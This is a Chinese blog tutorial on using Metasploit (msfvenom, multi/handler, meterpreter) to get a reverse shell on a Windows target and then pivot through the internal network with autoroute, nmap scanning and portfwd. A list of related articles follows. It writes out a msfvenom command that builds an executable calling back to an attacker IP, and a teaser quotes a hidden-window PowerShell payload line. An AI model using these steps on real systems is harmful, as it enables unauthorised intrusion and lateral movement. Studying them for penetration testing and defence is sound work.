使用msf进行反弹shell+内网渗透

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量1.2w 收藏 21
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jsmaster01/article/details/85402292
版权

首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令
反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。
一、反弹shell:
1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx(这里指代的是攻击机ip) lport=xxxx(这里指代的是攻击机的监听端口)-f exe(这里指代的是可执行文件的类型)-o xx.exe”。即可创建被控端的客户端文件。

2.在攻击机的msf中启动监听模块,use exploit/multi/handler,并设置相应的payload,payload的选择取决于生成被控端文件用了什么模块,名字都是一样的。接着options设置好相应的参数。在这里需要指出的是,msfconsole一定要在root权限下执行。

3.接下来将生成的被控端文件放到靶机内,并在靶机内执行。msf就可以收到靶机的session,在msf中使用sessions命令即可看到当前收到的session,并使用session 1就可以取得第一个session的会话,呼出meterpreter模块,在meterpreter模块中输入shell即可实现反弹shell。

二、内网渗透
1.在达成以上步骤后,即可添加路由,添加路由使用msf自动添加即可。具体命令为:run post/multi/manage/autoroute。

2.路由设置完毕后,即可使用ifconfig或是ipconfig探测靶机的ip情况,并使用nmap等扫描工具,对其所在的网段进行扫描。进而发现其他内网中的靶机。

3.若我们发现了一个主机开放了80端口,我们可以想象这个主机开放了web服务,此时要对此端口进行端口转发,那么我们可以在meterpreter下使用msf自带的端口转发服务,具体命令如下:“portfwd add -l xxxx(本机待转发端口) -r xxx.xxx.xxx.xxx(待转发的内网主机地址) -p xxxx(待转发的内网主机端口)”。即可实现将内网主机的端口转发到本地某端口上,并可以在本地浏览器中输入localhost:xxxx进行访问并作进一步的渗透。

JSMa4ter
关注
  • 1
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF中的shell.pdf
12-02
E019-渗透测试常用工具-使用cobaltstrike接口来传递MSF中的shell
msf内网渗透
10-29
msf内网渗透
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 1812
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务框架,新的免杀模块,优化了控制功能等。下面小白总结了一下在渗透测试中,使用频率较多的MSF命令,分为以下几块来讲。信息收集发现目标网段的存活主机:我们可以利用auxili
MSF 内网渗透(案例)
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shellmsf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
MSF反弹shell原理
weixin_47063945的博客
11-09 189
介绍了MSF反弹shell原理
利用msfvenom制作木马,并且反弹shell
m0_64444909的博客
09-14 4820
msf
冰蝎下的反弹shell连接msfconsole
热门推荐
Master先生的博客
01-07 5万+
文章目录前言一、使用木马getshell1.搭建环境二、冰蝎配置三、kali监听总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。 这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就
2022渗透测试-反弹shell的详细讲解
保持微笑的博客
02-07 4896
1.反弹shell简介 反弹shell是一种反向链接,与正向的ssh等不同,它是在对方电脑执行命令连接到我方的攻击模式,并且这种攻击模式必须搭配远程执行命令漏洞来使用。 2.为什么要进行反弹shell 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器,这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。 那么什么情况下正向连接不太好用了呢: 1. 某客户机中了你的网马,但是它在局域网内,你直接连接不了。 2. 它的ip
内网的MSF接收反向shell
m0_46736332的博客
10-27 2830
内网虚拟机MSF接收外网以及不同局域网机器的反向shell
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理
反弹shell失败的几种原因
谢公子的博客
05-03 1万+
在实战中,我们经常会遇到各种各样奇怪的环境。 反弹shell失败的原因有很多: 反弹的命令不存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议 反弹的命令不存在或当前用户无权限调用bash 由于这种情况下只局限于Linux,所以不考虑Windows 反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash来反弹,所以 #bas...
后渗透——利用kali工具MSF反弹shell
爱国小白帽
03-16 5279
msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会了解利用这个接口的强大功能。 实验环境: Windows Server 2008 R2 x64 kali 模拟实验: 首先输入msfconsole打开软...
msf反弹shell
cj_Hydra's Blog
02-01 1433
windows+exe反弹 使用msfvenom模块生成一个被控端的客户端文件,这里用windows 64为例(如果不加x64,则默认是32位),此时就会生成一个shell.exe的程序。 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=攻击机ip地址 lport=监听端口 -f exe >shell.exe 在攻击机的m...
端口代理反弹shell原理应用
qq_39641273的博客
06-14 355
我们发现在实际的攻击过程中,使用常规反弹shell攻击者的计算机IP地址将被暴露给受害者计算机,因为攻击者需要将自己的计算机IP地址提供给受害者计算机以建立连接。当对方具备一定的抓包和溯源能力就能借此溯源到攻击者。因此,对方反弹shell攻击可能会危及攻击者的匿名性和安全。这些技术可以用来隐藏攻击者的真实IP地址,从而增强攻击的匿名性和安全性。下面是一些常用的增强反弹shell匿名性的技术:端口转发:攻击者可以使用端口转发技术将流量从受害者计算机转发到攻击者的计算机上,从而隐藏自己的真实IP地址。
利用msf实现反弹shell与提权(细节过程秒懂)
Naiisii的博客
01-13 5682
环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻 在线快速生成payload网站 这里的IP设置为KaliIP,端口不要与其他服务冲突 接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以) 把下载好的文件放至网页,由靶机win7通过访问网页下载 mv reverse.exe /var/
msf反弹shell内网渗透
OKAY_TC的博客
10-16 1814
用法示例: 1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection -o xx.ps1 //生成文件放在目标机目录下 //powershell执行脚本:powershell -windowstyle hidden -e...
使用MSF反向反弹shell
weixin_45588247的博客
07-20 4460
实验准备: 攻击(攻击者)主机: kali 2020.2 虚拟机 nat 192.168.254.132 反向反弹: 【步骤一】:msfconsole启动,结果如【图1】所示: 【命令】 msfconsole 一、msfconsole(这种没有启用数据库,搜索某些东西会很慢) 二、数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值